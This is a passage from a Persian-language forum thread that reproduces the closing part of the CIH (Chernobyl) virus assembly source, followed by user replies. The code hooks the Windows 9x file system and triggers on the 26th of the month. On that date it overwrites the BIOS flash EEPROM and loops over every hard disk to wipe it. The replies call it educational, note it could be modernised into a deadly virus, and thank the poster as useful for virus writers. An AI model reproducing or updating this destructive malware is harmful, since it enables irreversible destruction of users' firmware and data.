; * Request.                          *
; *************************************

pIFSFunc&#58;
			mov	ebx, esp
			push	dword ptr &#91;ebx+20h+04h+14h&#93;	; Push pioreq
			call	&#91;ebx+20h+04h&#93;			; Call pIFSFunc
			pop	ecx				;

			mov	&#91;ebx+1ch&#93;, eax	; Modify EAX Value in Stack

; ***************************
; * After Calling pIFSFunc, *
; * Get Some Data from the  *
; * Returned pioreq.        *
; ***************************

			cmp	dword ptr &#91;ebx+20h+04h+04h&#93;, 00000024h
			jne	QuitMyVirusFileSystemHook

; *****************
; * Get the File  *
; * Modification  *
; * Date and Time *
; * in DOS Format.*
; *****************

			mov	eax, &#91;ecx+28h&#93;
			mov	&#40;FileModificationTime-@6&#41;&#91;esi&#93;, eax

; ***************************
; * Quit My Virus'          *
; * IFSMgr_FileSystemHook   *
; ***************************

QuitMyVirusFileSystemHook&#58;

			popad

			ret

; *************************************
; * Kill Computer !? ...   *^_^*      *
; *************************************

IsKillComputer&#58;
			; Get Now Day from BIOS CMOS
			mov	al, 07h
			out	70h, al
			in	al, 71h

			xor	al, 26h	; ??/26/????

IF	DEBUG
			jmp	DisableOnBusy
ELSE
			jnz	DisableOnBusy
ENDIF

; **************************************
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; **************************************

; ***************************
; * Kill BIOS EEPROM        *
; ***************************

			mov	bp, 0cf8h
			lea	esi, IOForEEPROM-@7&#91;esi&#93;

; ***********************
; * Show BIOS Page in   *
; * 000E0000 - 000EFFFF *
; *    &#40;   64 KB   &#41;    *
; ***********************

			mov	edi, 8000384ch
			mov	dx, 0cfeh
			cli
			call	esi

; ***********************
; * Show BIOS Page in   *
; * 000F0000 - 000FFFFF *
; *    &#40;   64 KB   &#41;    *
; ***********************

			mov	di, 0058h
			dec	edx					; and al,0fh
			mov	word ptr &#40;BooleanCalculateCode-@10&#41;&#91;esi&#93;, 0f24h
			call	esi

; ***********************
; * Show the BIOS Extra *
; * ROM Data in Memory  *
; * 000E0000 - 000E01FF *
; *   &#40;   512 Bytes   &#41; *
; * , and the Section   *
; * of Extra BIOS can   *
; * be Writted...       *
; ***********************

			lea	ebx, EnableEEPROMToWrite-@10&#91;esi&#93;

			mov	eax, 0e5555h
			mov	ecx, 0e2aaah
			call	ebx
			mov	byte ptr &#91;eax&#93;, 60h

			push	ecx
			loop	$

; ***********************
; * Kill the BIOS Extra *
; * ROM Data in Memory  *
; * 000E0000 - 000E007F *
; *   &#40;   80h Bytes   &#41; *
; ***********************

			xor	ah, ah
			mov	&#91;eax&#93;, al

			xchg	ecx, eax
			loop	$

; ***********************
; * Show and Enable the *
; * BIOS Main ROM Data  *
; * 000E0000 - 000FFFFF *
; *   &#40;   128 KB   &#41;    *
; * can be Writted...   *
; ***********************

			mov	eax, 0f5555h
			pop	ecx
			mov	ch, 0aah
			call	ebx
			mov	byte ptr &#91;eax&#93;, 20h

			loop	$

; ***********************
; * Kill the BIOS Main  *
; * ROM Data in Memory  *
; * 000FE000 - 000FE07F *
; *   &#40;   80h Bytes   &#41; *
; ***********************

			mov	ah, 0e0h
			mov	&#91;eax&#93;, al

; ***********************
; * Hide BIOS Page in   *
; * 000F0000 - 000FFFFF *
; *    &#40;   64 KB   &#41;    *
; ***********************
									; or al,10h
			mov	word ptr &#40;BooleanCalculateCode-@10&#41;&#91;esi&#93;, 100ch
			call	esi

; ***************************
; * Kill All HardDisk       *
; **************************************************  *
; * IOR Structure of IOS_SendCommand Needs          *
; **************************************************  *
; * ?? ?? ?? ?? 01 00 ?? ?? 01 05 00 40 ?? ?? ?? ?? *
; * 00 00 00 00 00 00 00 00 00 08 00 00 00 10 00 c0 *
; * ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? *
; * ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? *
; * ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 80 ?? ?? *
; **************************************************  *

KillHardDisk&#58;
			xor	ebx, ebx
			mov	bh, FirstKillHardDiskNumber
			push	ebx
			sub	esp, 2ch
			push	0c0001000h
			mov	bh, 08h
			push	ebx
			push	ecx
			push	ecx
			push	ecx
			push	40000501h
			inc	ecx
			push	ecx
			push	ecx

			mov	esi, esp
			sub	esp, 0ach

LoopOfKillHardDisk&#58;
			int	20h
			dd	00100004h	; VXDCall IOS_SendCommand

			cmp	word ptr &#91;esi+06h&#93;, 0017h
			je	KillNextDataSection

ChangeNextHardDisk&#58;
			inc	byte ptr &#91;esi+4dh&#93;

			jmp	LoopOfKillHardDisk

KillNextDataSection&#58;
			add	dword ptr &#91;esi+10h&#93;, ebx
			mov	byte ptr &#91;esi+4dh&#93;, FirstKillHardDiskNumber

			jmp	LoopOfKillHardDisk

; ***************************
; * Enable EEPROM to Write  *
; ***************************

EnableEEPROMToWrite&#58;
			mov	&#91;eax&#93;, cl
			mov	&#91;ecx&#93;, al
			mov	byte ptr &#91;eax&#93;, 80h
			mov	&#91;eax&#93;, cl
			mov	&#91;ecx&#93;, al

			ret

; ***************************
; * IO for EEPROM           *
; ***************************

IOForEEPROM&#58;
@10			=	IOForEEPROM

			xchg	eax, edi
			xchg	edx, ebp
			out	dx, eax

			xchg	eax, edi
			xchg	edx, ebp
			in	al, dx

BooleanCalculateCode	=	$
			or	al, 44h

			xchg	eax, edi
			xchg	edx, ebp
			out	dx, eax

			xchg	eax, edi
			xchg	edx, ebp
			out	dx, al

			ret

; **************************************************  *******
; *			Static Data                       *
; **************************************************  *******

LastVxDCallAddress	=	IFSMgr_Ring0_FileIO
VxDCallAddressTable	db	00h
			db	IFSMgr_RemoveFileSystemApiHook-_PageAllocate
			db	UniToBCSPath-IFSMgr_RemoveFileSystemApiHook
			db	IFSMgr_Ring0_FileIO-UniToBCSPath

VxDCallIDTable		dd	00010053h, 00400068h, 00400041h, 00400032h
VxDCallTableSize	=	&#40;$-VxDCallIDTable&#41;/04h

; **************************************************  *******
; *                Virus Version Copyright                *
; **************************************************  *******

VirusVersionCopyright	db	'CIH v'
			db	MajorVirusVersion+'0'
			db	'.'
			db	MinorVirusVersion+'0'
			db	' TATUNG'

; **************************************************  *******
; *			Virus Size                        *
; **************************************************  *******

VirusSize			=	$
;				+ SizeOfVirusCodeSectionTableEndMark&#40;04h&#41;
;				+ NumberOfSections&#40;??&#41;*SizeOfVirusCodeSectio  nTable&#40;08h&#41;
;				+ SizeOfTheFirstVirusCodeSectionTable&#40;04h&#41;

; **************************************************  *******
; *			Dynamic Data                      *
; **************************************************  *******

VirusGameDataStartAddress	=	VirusSize
@6				=	VirusGameDataStartAddress
OnBusy				db	0
FileModificationTime		dd	?

FileNameBuffer		db	FileNameBufferSize dup&#40;?&#41;
@7			=	FileNameBuffer

DataBuffer		=	$
@8			=	DataBuffer
NumberOfSections	dw	?
TimeDateStamp		dd	?
SymbolsPointer		dd	?
NumberOfSymbols		dd	?
SizeOfOptionalHeader	dw	?
_Characteristics	dw	?
Magic			dw	?
LinkerVersion		dw	?
SizeOfCode		dd	?
SizeOfInitializedData	dd	?
SizeOfUninitializedData	dd	?
AddressOfEntryPoint	dd	?
BaseOfCode		dd	?
BaseOfData		dd	?
ImageBase		dd	?
@9			=	$
SectionAlignment	dd	?
FileAlignment		dd	?
OperatingSystemVersion	dd	?
ImageVersion		dd	?
SubsystemVersion	dd	?
Reserved		dd	?
SizeOfImage		dd	?
SizeOfHeaders		dd	?
SizeOfImageHeaderToRead		=	$-NumberOfSections

NewAddressOfEntryPoint	=	DataBuffer	; DWORD
SizeOfImageHeaderToWrite	=	04h

StartOfSectionTable	=	@9
SectionName		=	StartOfSectionTable	; QWORD
VirtualSize		=	StartOfSectionTable+08h	; DWORD
VirtualAddress		=	StartOfSectionTable+0ch	; DWORD
SizeOfRawData		=	StartOfSectionTable+10h	; DWORD
PointerToRawData	=	StartOfSectionTable+14h	; DWORD
PointerToRelocations	=	StartOfSectionTable+18h	; DWORD
PointerToLineNumbers	=	StartOfSectionTable+1ch	; DWORD
NumberOfRelocations	=	StartOfSectionTable+20h	; WORD
NumberOfLinenNmbers	=	StartOfSectionTable+22h	; WORD
Characteristics		=	StartOfSectionTable+24h	; DWORD
SizeOfScetionTable	=	Characteristics+04h-SectionName

; **************************************************  *******
; *		Virus Total Need Memory                   *
; **************************************************  *******

VirusNeedBaseMemory	=	$

VirusTotalNeedMemory	=	@9
;				+ NumberOfSections&#40;??&#41;*SizeOfScetionTable&#4  0;28h&#41;
;				+ SizeOfVirusCodeSectionTableEndMark&#40;04h&#41;
;				+ NumberOfSections&#40;??&#41;*SizeOfVirusCodeSectio  nTable&#40;08h&#41;
;				+ SizeOfTheFirstVirusCodeSectionTable&#40;04h&#41;

; **************************************************  *******
; **************************************************  *******

VirusGame               ENDS

                        END     FileHeader

----------


## 30yavash

خیلی قدیمی شده الان دیگه با ضد ویروس ها سه سوته پاک می شه.

----------


## Yunas Farhadnia

> خیلی قدیمی شده الان دیگه با ضد ویروس ها سه سوته پاک می شه.


فکر می کنم هدف آقای Best Programer جنبی آموزشی مسئله بوده نه این که بخوان الان بعد از کلی سال این ویروس رو معرفی کنند تا شما باهاش چهار تا کامپیوتر مثل مال خودتونو آلوده کنید.
این حرف شما منو یاد اون ضرب المثل انداخت که وقتی یه عاقل با انگشت ماه رو نشون می ده ...
 :flower:  :)  :wink:

----------


## Developer Programmer

من اون قسمت اولش رو که داره هدر فایل رو تنظیم میکنه اصلا نمیفهمم
یعنی همینطور گیج میمونم که اخه چطوری تونسته اینهمه عدد بچینه تا یه هدر بسازه

----------


## Best Programmer

بهتر هست تا در مورد PE File ها بیشتر مطالعه بکنی.
البته این از تکنولوژی VXD استفاده کرده برای همین در WINNT Base کار نمی کنه.البته راه داره ولی فقط در همان لحظه ایی که سیستم Scan Disk میشود (Login) میتونی دسترسی حد بالا متل VXD در Win9X داشته باشی :mrgreen:  :evil2: 
البته اگر کسی حوصله بکنه و این را مدرن بکند میتواند ویروس مهلکی باشد ولی به جای این کارا .....

----------


## Vahab

:flower:  :flower:  :flower:  :flower:

----------


## arshia_

واقعا کد جالبی است.....ممنون

----------


## محمد میرمصطفی

wow

----------


## mostafa.vahab

ای ولا بابا

----------


## marjan r

پروژه اسمبلی می خوام.یکی کمک کنه.بازی باشه بهتره

----------


## ali virus

به نظر من کرم جدید NETSKY Q.WORM  از این هم قوی تر باشه . 
به این سایت یه سر بزنید : WWW.VIRUSRADAR.COM

----------


## promazaheri

خيلي ممنون از كدي كه گذاشتي براي كسي كه ميخواد ويروس بنويسه خيلي بدرد بخوره

----------

